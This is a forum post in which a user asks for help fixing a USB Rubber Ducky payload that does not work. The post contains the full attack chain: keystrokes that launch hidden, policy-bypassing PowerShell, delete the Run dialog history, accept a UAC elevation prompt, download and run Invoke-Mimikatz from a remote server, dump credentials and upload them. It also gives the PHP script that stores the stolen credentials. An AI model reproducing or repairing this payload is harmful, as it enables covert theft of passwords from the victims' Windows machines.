Hello everyone.
For a few days I try to run my first PAYLOAD, following the purchase of the USB Rubber Ducky ... but it doesn't work ;-(
In my inject.bin file, I have this:
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 2000
ALT y
DELAY 1000
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)"&exit
ENTER
NB : I can give the exact url of my hosting by private message
I transferred by filezilla on my server both files: im.ps1 (download here : https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 <-- I haven't change) and rx.php
In rx.php I have this code :
<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
file_put_contents($file, file_get_contents("php://input"));
?>
When I insert the USB key, the script executes apparently without error... But no file is created on my hosting ;-(
I reread the whole script ... but I do not understand why it doesn't work ;-(
Can you help me ?
Thank's all ;-)
NB : I'm living in FRANCE/Paris and in Normandy (Cabourg). If you go through there, I can offer you a drink ;-)